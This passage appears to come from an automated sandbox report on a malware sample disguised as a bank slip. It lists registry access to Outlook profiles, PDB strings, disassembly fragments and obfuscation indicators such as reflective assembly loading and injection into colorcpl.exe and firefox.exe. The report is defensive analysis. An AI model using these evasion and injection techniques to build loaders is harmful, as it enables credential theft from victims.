                Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO1268931024 - Bank Slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO1268931024 - Bank Slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: colorcpl.pdbGCTL source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eiVHpMoiongmS.exe, 00000004.00000002.4157212412.00000000000FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO1268931024 - Bank Slip.exe, PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PbnE.pdb source: PO1268931024 - Bank Slip.exe
                Source: Binary string: PbnE.pdbSHA2561 source: PO1268931024 - Bank Slip.exe

                Data Obfuscation

                barindex
                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                Source: PO1268931024 - Bank Slip.exe, FormLogin.cs.Net Code: InitializeComponent
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.cs.Net Code: D2gBOyqNMv System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.cs.Net Code: D2gBOyqNMv System.Reflection.Assembly.Load(byte[])
                Source: 4.2.eiVHpMoiongmS.exe.476cd14.1.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: 7.2.colorcpl.exe.588cd14.2.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: 8.2.firefox.exe.f52cd14.0.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: PO1268931024 - Bank Slip.exeStatic PE information: 0xFF0DE143 [Fri Aug 7 14:48:35 2105 UTC]
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_07B30CE1 push ecx; iretd 0_2_07B30D1C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00406155 push ss; retf 2_2_00406160
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00403270 push eax; ret 2_2_00403272
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040227F pushad ; retf 2_2_00402280
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040BB30 push eax; ret 2_2_0040BB31
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00404DCD push ebx; iretd 2_2_00404DD8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004066BD push edx; iretd 2_2_004066BF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00413F7E pushad ; retf 2_2_00414025
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00413FC5 pushad ; retf 2_2_00414025
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0176225F pushad ; ret 2_2_017627F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017627FA pushad ; ret 2_2_017627F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017909AD push ecx; mov dword ptr [esp], ecx2_2_017909B6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0176283D push eax; iretd 2_2_01762858
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_043385C5 push eax; ret 4_2_043385C6
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04341EFD push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04341F24 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04341F12 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04341F57 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04331862 push ebx; iretd 4_2_0433186D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04333152 push edx; iretd 4_2_04333154
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04340A13 pushad ; retf 4_2_04340ABA
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04340A5A pushad ; retf 4_2_04340ABA
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_043423E2 push 899D5642h; ret 4_2_043423E7
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04332BEA push ss; retf 4_2_04332BF5
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C1264C push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C12607 push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C12619 push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C01F57 push ebx; iretd 4_2_06C01F62
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C14F1B push ebp; iretd 4_2_06C14F1D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C08CBA push eax; ret 4_2_06C08CBB
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C125F2 push esi; ret 4_2_06C12671
                Source: PO1268931024 - Bank Slip.exeStatic PE information: section name: .text entropy: 7.944994526598998
                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, iMgNRDnKiuJxHfBTGt.csHigh entropy of concatenated method names: 'fFno0cM2KD', 'YT9oQb94X5', 'X29oOdurbZ', 'kXIoegeJPi', 'kZRormCwX0', 'mrVoRlDVj4', 'ABsoUkhMXW', 'OBrowErToj', 'Sp9o17p400', 'UB8oCFpj4B'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csHigh entropy of concatenated method names: 'essv8kXPpE', 'zOkv6OSNfH', 'gWtvMgkHno', 'nn8vXbGAm1', 'KlMvc6wbPa', 'pPcvbynOjb', 'uMovow4guC', 'uJ8v2Z5hSC', 'bsvvJnJoSt', 'a3mvd7KyJm'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, k79X0HLvpocmmMu7k0.csHigh entropy of concatenated method names: 'GwvgwGCnQd', 'Jdtg1l1quL', 'XZ8gi0xbIA', 'Ve8g5EBbeE', 'jPtglTy6QD', 'yLRgkpRk7G', 'gSSgxj7CxW', 'FUrg4Cab1V', 'YflgD6khuE', 'nJSgyfkigy'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, F4jhGKFkthaxmmRlqM.csHigh entropy of concatenated method names: 'r00bqTcvZI', 'QmwbWl5LOa', 'l1ObaUcAK9', 'ToString', 'g9Xb72EOa3', 'pA9bEkADux', 'L6H6GINmRbtcsKT8YCM', 'xLTYyiN33W2KVLEeYK5', 'OBTtOxNWBVDDM6vta9H'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, GvlGYIMP3ZvXsgW7TY.csHigh entropy of concatenated method names: 'Dispose', 'HWdN9mtu7t', 'wEPZ5rOVm7', 'yqaNNAqe7A', 'sGgNSg6q4w', 'EvcNzyXSiH', 'ProcessDialogKey', 'Co6ZKUBLM0', 'Sf5ZN4PP0P', 'rp8ZZDnE3x'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, sgg6q4hw1vcyXSiHUo.csHigh entropy of concatenated method names: 'UqUs6Sth3j', 'q7csM0fjok', 'C16sXiCeNM', 'X8kscTAKJ1', 'h8ksb16At4', 'Ypesojmup4', 'FQ8s2y3bSi', 'ccLsJIIsu9', 'T9KsdK1m8R', 'bdDsp3ElCQ'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, O7Cmpe14JM3jvYdyhV.csHigh entropy of concatenated method names: 'UvCXep0NCa', 'nFiXR93jGc', 'wgKXwkaj6X', 't1vX1ER2Yi', 'jcVXHAuRVf', 'nbLXTH9dFJ', 'c56XPXw3ls', 'nqRXsERXVp', 'vvHXIUb8As', 'CIkXGDKDb1'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, hswGL9NNIPdNbRkcltZ.csHigh entropy of concatenated method names: 'ToString', 'a1WGvWdxJt', 'd05GBpoKqS', 'oyLG8cfTkk', 'OSSG6mbvrk', 'lpWGMbPt1e', 'q1SGX5IJYl', 'qyDGcqqvCa', 'kEpvEwn2YvuDlIst5AN', 'jFK1uAnZulclWj0BnIT'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, fUBLM09qf54PP0Psp8.csHigh entropy of concatenated method names: 'dsJsi4ytqC', 'y4ss5DcpKL', 'pXrsYlwlCS', 'EvEslpnPls', 'eGAsjw6Huq', 'tdPsk7EC9T', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, EEIGg3Wjddmb4vGGrT.csHigh entropy of concatenated method names: 'YbyPdP7sMk', 'V4HPprF701', 'ToString', 'hE3P6YUWYZ', 'lx6PMm05Po', 'yRYPXnXTlx', 'WMxPcXbDei', 'QxGPbPRXQY', 'aOHPoJFBGV', 'na0P2tC4Hb'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, tDSQkPNv7yeAstPUZ4c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xvSGjk0DUd', 'Wq4GuUkyLD', 'w5uGq93324', 'rmwGWmDJQE', 'nKWGakNSpo', 'MkgG7L7IWp', 'RN9GEMon6a'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, eLkFCeqpRbdVwZOQlK.csHigh entropy of concatenated method names: 'ToString', 'BoaTyp2Oko', 'KybT5mFxVH', 'rGKTY3YglY', 'CnZTlyjIlp', 'DlNTkYXNtZ', 'AIOTFllvkI', 'bLtTx5ZuWi', 'MpJT4HmU1g', 'BZDTnSDcod'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, gQY6V7ztExRJNV9frf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qcrIg7ME0b', 'supIHPTV7K', 'twCIT3QDSx', 'tPRIPR6qEZ', 'hZ3Is2THtP', 'lYeIIVeAXw', 'O6JIGSkEct'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, Y1hQoqZRAk19oX3EeO.csHigh entropy of concatenated method names: 'pEeOUu1oF', 'RIpew0y8W', 'eEHROfBt7', 'Y0pUZkhd2', 'G2M1CFEjm', 'dbJCJfJvt', 'xfWWcl3aGhlM92RG5R', 'k7ukbwWwiBB8GJmyrR', 'j2GsOV6sA', 'ITUGGsX84'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, OnE3xnSPGlvkPKQTLa.csHigh entropy of concatenated method names: 'ivNINfZVsd', 'oSRIvrpgC4', 'kX6IBkhWpn', 'iEGI6dbxjJ', 'eSJIMvoYkJ', 'CbYIcvIRCa', 'nHRIbCJjGo', 'YJvsEcNe1x', 'YtXshx6UWx', 'jNGs9vB5iX'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, zJHaTd5uJ70DVWmeFL.csHigh entropy of concatenated method names: 'Dugow3NSh0Y0hc8BFHu', 'z9HkMBNMwK8uQj8v3RG', 'PZ7bsIqWNq', 'L1sbITx1cr', 'MXTbGbEHq5', 'r0kr0AN774omMB72BBN', 'GDtKZ7NJDyw5npUCdCT'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, qJpY5kwCJw8gj8Ev7k.csHigh entropy of concatenated method names: 'CSJMjb5CE3', 'FiRMuK3yEi', 'TFvMqqoHhd', 'zN8MWp249v', 'rAgMa3ctIZ', 'ntGM7t4nrn', 'S06MEGLUhf', 'bTkMhdctT6', 'GNpM9JYDHf', 'EwvMSio3c2'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, SuHf0cXdLMjMfinDR1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sUKZ9tVtVa', 'fBeZSTpI1p', 'mxyZz2eJEW', 'd9jvKHQbBp', 'IplvNeOBw8', 'Y5CvZ1yNJu', 'RKOvvvE5Nr', 'BMTNTGZn3ODeJodc2Q6'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, cDxrLVBtMFiEwOHFYI.csHigh entropy of concatenated method names: 'YwPNoJpY5k', 'FJwN28gj8E', 'A4JNdM3jvY', 'myhNpV7UGU', 'BZtNHJj8FX', 'YWRNTAjFuL', 'XMXhZwjmj7LS52BZZv', 'kfbAF1vmbbtNbeWRrm', 'tb6NN7082A', 'BlxNvRgUKH'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, xuEuXIx9AaMG0iN3od.csHigh entropy of concatenated method names: 'i0Io60T81S', 'LA9oXxN2wB', 'XXcob3yrpu', 'SAGbSWZ2Wn', 'QFIbzauJ8P', 'RncoKt5jKw', 'S4GoNeKp6t', 'pseoZoOf9I', 'hGlovrhW8F', 'tQBoBDLVRO'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, eFXSWRiAjFuLt6CNKS.csHigh entropy of concatenated method names: 'PvTb8A0dKW', 'nWRbM5cFhw', 'MPibcSuE1a', 'wTebowfnDa', 'YBkb24WWMI', 'V54caIfHpM', 'UUpc7QycgM', 'PHlcEaH3bc', 'RYqchxAC59', 'R2Pc9qs4EE'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, VUGUNiCOs42JoRZtJj.csHigh entropy of concatenated method names: 'FfbcrYrNwx', 'n3ecUg99G7', 'h6eXY7dpgZ', 'qOKXlPkuSL', 'w6pXkYwVeJ', 'W99XFld9bQ', 'WBjXxa9yD9', 'gatX4G5F49', 'PJTXnclCFh', 'HFMXDxVFFR'
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, YyI0SENKp6b8O6xuIMv.csHigh entropy of concatenated method names: 'UDUI0oI58O', 'gF2IQCfxnp', 'gJTIOZWOhr', 'LdyIeKZPoI', 'V2FIrL2wyx', 'lAVIRg22ge', 'klcIUiZf7l', 'hgjIwRBi7A', 'JHPI1KGEa9', 'ITtICR4rtb'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, iMgNRDnKiuJxHfBTGt.csHigh entropy of concatenated method names: 'fFno0cM2KD', 'YT9oQb94X5', 'X29oOdurbZ', 'kXIoegeJPi', 'kZRormCwX0', 'mrVoRlDVj4', 'ABsoUkhMXW', 'OBrowErToj', 'Sp9o17p400', 'UB8oCFpj4B'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csHigh entropy of concatenated method names: 'essv8kXPpE', 'zOkv6OSNfH', 'gWtvMgkHno', 'nn8vXbGAm1', 'KlMvc6wbPa', 'pPcvbynOjb', 'uMovow4guC', 'uJ8v2Z5hSC', 'bsvvJnJoSt', 'a3mvd7KyJm'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, k79X0HLvpocmmMu7k0.csHigh entropy of concatenated method names: 'GwvgwGCnQd', 'Jdtg1l1quL', 'XZ8gi0xbIA', 'Ve8g5EBbeE', 'jPtglTy6QD', 'yLRgkpRk7G', 'gSSgxj7CxW', 'FUrg4Cab1V', 'YflgD6khuE', 'nJSgyfkigy'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, F4jhGKFkthaxmmRlqM.csHigh entropy of concatenated method names: 'r00bqTcvZI', 'QmwbWl5LOa', 'l1ObaUcAK9', 'ToString', 'g9Xb72EOa3', 'pA9bEkADux', 'L6H6GINmRbtcsKT8YCM', 'xLTYyiN33W2KVLEeYK5', 'OBTtOxNWBVDDM6vta9H'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, GvlGYIMP3ZvXsgW7TY.csHigh entropy of concatenated method names: 'Dispose', 'HWdN9mtu7t', 'wEPZ5rOVm7', 'yqaNNAqe7A', 'sGgNSg6q4w', 'EvcNzyXSiH', 'ProcessDialogKey', 'Co6ZKUBLM0', 'Sf5ZN4PP0P', 'rp8ZZDnE3x'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, sgg6q4hw1vcyXSiHUo.csHigh entropy of concatenated method names: 'UqUs6Sth3j', 'q7csM0fjok', 'C16sXiCeNM', 'X8kscTAKJ1', 'h8ksb16At4', 'Ypesojmup4', 'FQ8s2y3bSi', 'ccLsJIIsu9', 'T9KsdK1m8R', 'bdDsp3ElCQ'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, O7Cmpe14JM3jvYdyhV.csHigh entropy of concatenated method names: 'UvCXep0NCa', 'nFiXR93jGc', 'wgKXwkaj6X', 't1vX1ER2Yi', 'jcVXHAuRVf', 'nbLXTH9dFJ', 'c56XPXw3ls', 'nqRXsERXVp', 'vvHXIUb8As', 'CIkXGDKDb1'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, hswGL9NNIPdNbRkcltZ.csHigh entropy of concatenated method names: 'ToString', 'a1WGvWdxJt', 'd05GBpoKqS', 'oyLG8cfTkk', 'OSSG6mbvrk', 'lpWGMbPt1e', 'q1SGX5IJYl', 'qyDGcqqvCa', 'kEpvEwn2YvuDlIst5AN', 'jFK1uAnZulclWj0BnIT'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, fUBLM09qf54PP0Psp8.csHigh entropy of concatenated method names: 'dsJsi4ytqC', 'y4ss5DcpKL', 'pXrsYlwlCS', 'EvEslpnPls', 'eGAsjw6Huq', 'tdPsk7EC9T', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, EEIGg3Wjddmb4vGGrT.csHigh entropy of concatenated method names: 'YbyPdP7sMk', 'V4HPprF701', 'ToString', 'hE3P6YUWYZ', 'lx6PMm05Po', 'yRYPXnXTlx', 'WMxPcXbDei', 'QxGPbPRXQY', 'aOHPoJFBGV', 'na0P2tC4Hb'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, tDSQkPNv7yeAstPUZ4c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xvSGjk0DUd', 'Wq4GuUkyLD', 'w5uGq93324', 'rmwGWmDJQE', 'nKWGakNSpo', 'MkgG7L7IWp', 'RN9GEMon6a'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, eLkFCeqpRbdVwZOQlK.csHigh entropy of concatenated method names: 'ToString', 'BoaTyp2Oko', 'KybT5mFxVH', 'rGKTY3YglY', 'CnZTlyjIlp', 'DlNTkYXNtZ', 'AIOTFllvkI', 'bLtTx5ZuWi', 'MpJT4HmU1g', 'BZDTnSDcod'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, gQY6V7ztExRJNV9frf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qcrIg7ME0b', 'supIHPTV7K', 'twCIT3QDSx', 'tPRIPR6qEZ', 'hZ3Is2THtP', 'lYeIIVeAXw', 'O6JIGSkEct'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, Y1hQoqZRAk19oX3EeO.csHigh entropy of concatenated method names: 'pEeOUu1oF', 'RIpew0y8W', 'eEHROfBt7', 'Y0pUZkhd2', 'G2M1CFEjm', 'dbJCJfJvt', 'xfWWcl3aGhlM92RG5R', 'k7ukbwWwiBB8GJmyrR', 'j2GsOV6sA', 'ITUGGsX84'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, OnE3xnSPGlvkPKQTLa.csHigh entropy of concatenated method names: 'ivNINfZVsd', 'oSRIvrpgC4', 'kX6IBkhWpn', 'iEGI6dbxjJ', 'eSJIMvoYkJ', 'CbYIcvIRCa', 'nHRIbCJjGo', 'YJvsEcNe1x', 'YtXshx6UWx', 'jNGs9vB5iX'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, zJHaTd5uJ70DVWmeFL.csHigh entropy of concatenated method names: 'Dugow3NSh0Y0hc8BFHu', 'z9HkMBNMwK8uQj8v3RG', 'PZ7bsIqWNq', 'L1sbITx1cr', 'MXTbGbEHq5', 'r0kr0AN774omMB72BBN', 'GDtKZ7NJDyw5npUCdCT'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, qJpY5kwCJw8gj8Ev7k.csHigh entropy of concatenated method names: 'CSJMjb5CE3', 'FiRMuK3yEi', 'TFvMqqoHhd', 'zN8MWp249v', 'rAgMa3ctIZ', 'ntGM7t4nrn', 'S06MEGLUhf', 'bTkMhdctT6', 'GNpM9JYDHf', 'EwvMSio3c2'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, SuHf0cXdLMjMfinDR1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sUKZ9tVtVa', 'fBeZSTpI1p', 'mxyZz2eJEW', 'd9jvKHQbBp', 'IplvNeOBw8', 'Y5CvZ1yNJu', 'RKOvvvE5Nr', 'BMTNTGZn3ODeJodc2Q6'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, cDxrLVBtMFiEwOHFYI.csHigh entropy of concatenated method names: 'YwPNoJpY5k', 'FJwN28gj8E', 'A4JNdM3jvY', 'myhNpV7UGU', 'BZtNHJj8FX', 'YWRNTAjFuL', 'XMXhZwjmj7LS52BZZv', 'kfbAF1vmbbtNbeWRrm', 'tb6NN7082A', 'BlxNvRgUKH'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, xuEuXIx9AaMG0iN3od.csHigh entropy of concatenated method names: 'i0Io60T81S', 'LA9oXxN2wB', 'XXcob3yrpu', 'SAGbSWZ2Wn', 'QFIbzauJ8P', 'RncoKt5jKw', 'S4GoNeKp6t', 'pseoZoOf9I', 'hGlovrhW8F', 'tQBoBDLVRO'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, eFXSWRiAjFuLt6CNKS.csHigh entropy of concatenated method names: 'PvTb8A0dKW', 'nWRbM5cFhw', 'MPibcSuE1a', 'wTebowfnDa', 'YBkb24WWMI', 'V54caIfHpM', 'UUpc7QycgM', 'PHlcEaH3bc', 'RYqchxAC59', 'R2Pc9qs4EE'
